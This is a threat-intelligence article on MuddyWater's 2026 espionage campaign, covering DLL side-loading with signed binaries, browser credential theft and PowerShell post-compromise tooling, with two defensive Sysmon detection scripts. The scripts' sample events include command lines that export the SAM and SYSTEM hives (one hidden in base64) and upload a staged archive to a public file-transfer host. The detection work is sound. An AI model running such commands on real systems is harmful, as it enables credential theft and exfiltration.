
MuddyWater Espionage Campaign Hits 9 Countries in Q1 2026
An Iranian state-linked hacking group carried out a sweeping MuddyWater espionage campaign in the first quarter of 2026, compromising at least nine organizations across nine countries on four continents. The operation targeted a diverse range of sectors and relied on a layered set of evasion techniques, including the abuse of legitimately signed security software, to stay hidden inside victim networks.
Who Was Targeted
The victims span a broad set of industries and geographies. A major South Korean electronics manufacturer was among the most notable targets, with attackers spending an entire week inside its network in February 2026. An international airport in the Middle East, Southeast Asian industrial manufacturers, and a Latin American financial services provider were also confirmed targets. Education institutions and public sector bodies rounded out the list.
Researchers at Symantec and Carbon Black assessed the activity as intelligence-driven. The pattern of victims suggests a focus on industrial and intellectual property theft, government intelligence, and access to the corporate networks of downstream partners.
DLL Side-Loading at the Core of the Attack
The defining technique in this MuddyWater espionage campaign was DLL side-loading, which abuses the order in which Windows searches for a DLL that an application requests by name. The application's own directory is ordinarily checked before the system directories, so a malicious DLL placed beside a trusted executable is loaded into that executable's process and runs under its identity. Attackers paired malicious DLLs with legitimately signed executables to make their activity appear benign.
Two binaries were abused. The first, fmapp.exe, is an audio application signed by Fortemedia. It was used to sideload a malicious file named fmapp.dll, which establishes a connection to an attacker-controlled server. This same binary appeared in an earlier MuddyWater operation known as Operation Olalampo, which targeted organizations across the Middle East and North Africa.
The second binary, sentinelmemoryscanner.exe, is associated with a legitimate security product. Researchers assessed its selection as deliberate. Because it carries a valid signature from a known cybersecurity vendor, it is well placed to slip past controls that trust a code signature, such as application allowlisting and reputation-based scanning, and to draw less scrutiny from analysts. It was used to sideload a rogue DLL named sentinelagentcore.dll.
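As an added illustration of how a defender hunts for this pattern, the following Python runs a side-loading rule over Sysmon Event ID 7 (Image loaded) records. It is example code written for this article, not tooling from the Symantec and Carbon Black research. Sysmon's Signed and SignatureStatus fields describe the loaded module, not the host process, so the host executable's signer is supplied from a separate inventory (a dict here; in practice Get-AuthenticodeSignature output or EDR binary metadata). Every event, path, PID, and signer label below is constructed; the two executable/DLL pairs are only the file names reported above, and nothing is assumed about where they sat on disk in the real intrusions.

```python
"""Hunt for DLL side-loading in Sysmon Event ID 7 (Image loaded) telemetry.

Rule: a process whose executable carries a valid Authenticode signature loads a
DLL from its own directory (the first location in the default Windows search
order), and that DLL is unsigned or its signature does not validate.
Every event, path, signer label and PID in this file is constructed.
"""
from __future__ import annotations
import ntpath

# Executable/DLL pairs named in the reporting; a hit on one of these is promoted
# to high confidence. File names only, not on-disk paths.
KNOWN_ABUSED_PAIRS = {
    ("fmapp.exe", "fmapp.dll"),
    ("sentinelmemoryscanner.exe", "sentinelagentcore.dll"),
}

# Where a vendor installer normally places its binaries. A signed executable
# running from anywhere else (user profile, ProgramData, Temp) is itself a tell.
TRUSTED_INSTALL_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


def _norm(path: str) -> str:
    """Normalise a Windows path for comparison (case-insensitive, no '.\\')."""
    return ntpath.normpath(path).lower()


def find_sideloads(events: list[dict], exe_signers: dict[str, str | None]) -> list[dict]:
    """Return one finding per suspicious Event ID 7 record, in input order.

    exe_signers maps a normalised executable path to its validated signer, or
    None when the executable is unsigned or its signature does not validate.
    """
    findings = []
    for ev in events:
        if ev.get("EventID") != 7:
            continue
        image, loaded = _norm(ev["Image"]), _norm(ev["ImageLoaded"])
        exe_signer = exe_signers.get(image)
        if exe_signer is None:
            continue  # host process is not trusted, so there is no signature to borrow
        if ntpath.dirname(loaded) != ntpath.dirname(image):
            continue  # module came from elsewhere (System32 etc.), not the app directory
        if ev.get("Signed") == "true" and ev.get("SignatureStatus") == "Valid":
            continue  # the vendor's own signed component, expected
        pair = (ntpath.basename(image), ntpath.basename(loaded))
        severity = "medium"
        if pair in KNOWN_ABUSED_PAIRS or not image.startswith(TRUSTED_INSTALL_ROOTS):
            severity = "high"
        findings.append({
            "time": ev.get("UtcTime"), "pid": ev.get("ProcessId"),
            "image": image, "dll": loaded, "exe_signer": exe_signer,
            "dll_status": ev.get("SignatureStatus", "Unsigned"), "severity": severity,
        })
    return findings


# Constructed signer inventory: normalised path -> validated signer label.
SAMPLE_SIGNERS = {
    r"c:\users\public\audio\fmapp.exe": "Fortemedia",
    r"c:\programdata\scan\sentinelmemoryscanner.exe": "Security Vendor (placeholder)",
    r"c:\program files\acme\acme.exe": "Acme Corp (placeholder)",
}

# Constructed Sysmon EID 7 records, field names as Sysmon emits them.
SAMPLE_EVENTS = [
    {"EventID": 7, "UtcTime": "2026-02-10 09:14:02.117", "ProcessId": 4120,
     "Image": r"C:\Users\Public\audio\fmapp.exe", "ImageLoaded": r"C:\Users\Public\audio\fmapp.dll",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unsigned"},
    {"EventID": 7, "UtcTime": "2026-02-10 09:14:02.120", "ProcessId": 4120,
     "Image": r"C:\Users\Public\audio\fmapp.exe", "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 7, "UtcTime": "2026-02-10 09:15:40.003", "ProcessId": 4388,
     "Image": r"C:\ProgramData\scan\sentinelmemoryscanner.exe",
     "ImageLoaded": r"C:\ProgramData\scan\sentinelagentcore.dll",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unsigned"},
    {"EventID": 7, "UtcTime": "2026-02-10 09:20:11.551", "ProcessId": 5012,
     "Image": r"C:\Program Files\Acme\acme.exe", "ImageLoaded": r"C:\Program Files\Acme\acmecore.dll",
     "Signed": "true", "Signature": "Acme Corp", "SignatureStatus": "Valid"},
    {"EventID": 7, "UtcTime": "2026-02-10 09:20:11.560", "ProcessId": 5012,
     "Image": r"C:\Program Files\Acme\acme.exe", "ImageLoaded": r"C:\Program Files\Acme\updater.dll",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unsigned"},
    {"EventID": 7, "UtcTime": "2026-02-10 09:22:00.000", "ProcessId": 5300,
     "Image": r"C:\Users\bob\tool.exe", "ImageLoaded": r"C:\Users\bob\tool.dll",
     "Signed": "false", "Signature": "-", "SignatureStatus": "Unsigned"},
]

if __name__ == "__main__":
    for f in find_sideloads(SAMPLE_EVENTS, SAMPLE_SIGNERS):
        print(f"[{f['severity']}] pid={f['pid']} {f['image']} loaded {f['dll']} ({f['dll_status']})")
```

Run against the constructed sample, the rule fires three times: both abused pairs come out high (known pair, and in each case a signed binary executing from a user-writable directory), while the placeholder vendor's unsigned updater.dll under Program Files is a medium-confidence hit worth triaging rather than an alert on its own. The kernel32.dll load and the unsigned tool.exe are correctly ignored: the first is not resolved from the application directory, the second lends no trusted signature to borrow.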
Stealing Credentials Through the Browser
Both malicious DLLs embedded an open-source tool called ChromElevator, which is designed to extract passwords, cookies, and payment card data from Chromium-based browsers. Crucially, ChromElevator is capable of bypassing Chrome's App-Bound Encryption, a protection Google introduced specifically to prevent this type of credential theft.
The inclusion of ChromElevator in both sideloading chains suggests credential harvesting was a primary objective. Combined with lateral movement activity, the stolen credentials gave attackers a path deeper into each victim environment.
PowerShell, Node.js, and Living Off the Land
Beyond DLL abuse, the MuddyWater espionage campaign made heavy use of native system tools to conduct post-compromise operations. A Node.js-based implant chain was used to launch PowerShell scripts responsible for reconnaissance, screenshot capture, SAM hive theft, privilege escalation, and SOCKS5 reverse-proxy tunneling.
In at least one case, stolen data was staged on sendit.sh, a public file-transfer service, before being pulled by the attackers. This approach keeps exfiltration traffic off attacker-controlled infrastructure and blends more naturally with normal web activity.
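The post-compromise chain in the two paragraphs above leaves process-creation telemetry that a detection engineer can write rules against. The Python below, an added example and not code from the report or the group's tooling, evaluates three such rules over Sysmon Event ID 1 records: a Node.js runtime spawning PowerShell, an export of the SAM hive (together with the SYSTEM hive needed to decrypt it), and a command line referencing the public file-transfer service named above. Because the operators used PowerShell, the rules also inspect the decoded payload of a -EncodedCommand launch, so hive theft hidden behind base64 is still caught. All events are constructed; the command lines are illustrative, and the curl upload syntax is a placeholder, not the service's real API.

```python
"""Process-creation rules (Sysmon Event ID 1) for Node.js-launched PowerShell,
credential hive export and staging to a public file-transfer service.
PowerShell's -EncodedCommand payload is decoded so the rules see what an
encoded launcher actually ran. All sample events are constructed.
"""
from __future__ import annotations
import base64
import ntpath
import re

POWERSHELL = {"powershell.exe", "pwsh.exe"}
STAGING_HOSTS = ("sendit.sh",)  # the service named in the reporting
SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2}

ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIVE_EXPORT = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b", re.I)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def decoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script behind a -EncodedCommand switch, or ''."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


# Each rule sees the event and the full text it may inspect: the raw command
# line plus any decoded -EncodedCommand payload.
def node_spawns_powershell(ev: dict, text: str) -> bool:
    return _base(ev["ParentImage"]) == "node.exe" and _base(ev["Image"]) in POWERSHELL

def credential_hive_export(ev: dict, text: str) -> bool:
    return HIVE_EXPORT.search(text) is not None

def public_staging_service(ev: dict, text: str) -> bool:
    return any(host in text.lower() for host in STAGING_HOSTS)

RULES = [
    ("node_spawns_powershell", "high", node_spawns_powershell),
    ("credential_hive_export", "high", credential_hive_export),
    ("public_staging_service", "medium", public_staging_service),
]


def evaluate(events: list[dict]) -> list[dict]:
    """Return one finding per process-creation event that trips any rule."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        cmdline = ev.get("CommandLine", "")
        text = cmdline + "\n" + decoded_command(cmdline)
        hits = [(name, sev) for name, sev, pred in RULES if pred(ev, text)]
        if not hits:
            continue
        findings.append({
            "time": ev.get("UtcTime"), "pid": ev.get("ProcessId"),
            "image": ev["Image"], "parent": ev["ParentImage"],
            "rules": [name for name, _ in hits],
            "severity": max((sev for _, sev in hits), key=SEVERITY_RANK.__getitem__),
        })
    return findings


def _encode_ps(script: str) -> str:
    """Base64 a script the way PowerShell expects for -EncodedCommand (sample construction)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon EID 1 records; command lines are illustrative only.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2026-02-11 03:02:17.440", "ProcessId": 6120,
     "ParentImage": r"C:\Users\Public\node\node.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + _encode_ps(r"reg save hklm\sam C:\Users\Public\sam.hiv; reg save hklm\system C:\Users\Public\sys.hiv")},
    {"EventID": 1, "UtcTime": "2026-02-11 08:10:00.000", "ProcessId": 7001,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -c "Get-Process | Sort-Object CPU"'},
    {"EventID": 1, "UtcTime": "2026-02-11 03:05:41.902", "ProcessId": 6188,
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -T C:\Users\Public\staged.zip https://sendit.sh/"},  # placeholder syntax
    {"EventID": 1, "UtcTime": "2026-02-11 03:06:02.115", "ProcessId": 6200,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save HKLM\SAM C:\Windows\Temp\s.hiv"},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"[{f['severity']}] pid={f['pid']} {f['parent']} -> {f['image']}: {', '.join(f['rules'])}")
```

On the constructed sample the encoded launch from node.exe trips two rules at once (the lineage and, only after decoding, the hive export), the interactive Get-Process session is silent, the upload to the staging host is a medium-confidence hit, and a bare reg.exe save of the SAM hive is caught regardless of its parent. Lineage and decoded-payload rules together are what make the Node.js-to-PowerShell chain visible; either alone misses half the picture.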
Inside the South Korean manufacturer's network, attackers repeatedly re-executed both signed binaries to confirm they still had access. Researchers described the cadence as consistent with implant-driven activity rather than continuous hands-on operator presence: a sign of a more automated and operationally disciplined approach.
A Measurable Step Up in Operational Hygiene
None of the individual techniques used in this campaign are new. DLL side-loading, PowerShell abuse, and browser credential theft are all well-documented in the threat landscape. What stands out is how MuddyWater combined them and the care taken to avoid detection at each stage.
Researchers noted the group has moved toward quieter, more disciplined operations compared to its activity two or three years ago. The deliberate choice to abuse a security vendor's signed binary, specifically to exploit the trust that code signing is meant to convey, reflects a meaningful shift in how the group manages operational risk.
MuddyWater has been active since at least 2017 and operates under Iran's Ministry of Intelligence and Security. Earlier in 2026, separate activity tied to the group involved U.S. targets including a bank, an airport, and a defense-adjacent software supplier. That campaign introduced a previously undocumented backdoor called Dindoor alongside a Python-based tool named Fakeset.
The Broader Iranian Threat Picture
The campaign comes alongside wider Iranian cyber activity in 2026. The European Council sanctioned Iranian company Emennet Pasargad, also known as Shahid Shushtari and affiliated with Iran's Islamic Revolutionary Guard Corps Cyber-Electronic Command, for hacking a Swedish SMS service, stealing and selling a French subscriber database, and compromising advertising billboards during the 2024 Paris Olympics to spread disinformation.
A separate Iran-linked campaign, attributed to Iran's Ministry of Intelligence and Security and initially claimed by a pro-Iranian persona, hit organizations in the United States, Israel, Saudi Arabia, and Turkey between late March and early April 2026. At least two U.S. victims faced destructive operations, including deletion of partitions and data backups. That campaign used a custom C++ exfiltration tool internally named FileFiend, capable of enumerating local drives and SMB shares before sending data to a hardcoded command-and-control server.
The scale and variety of these operations underline a consistent pattern: Iranian threat actors are expanding their geographic reach, refining their tools, and blending espionage with disruptive activity in ways that complicate attribution and response.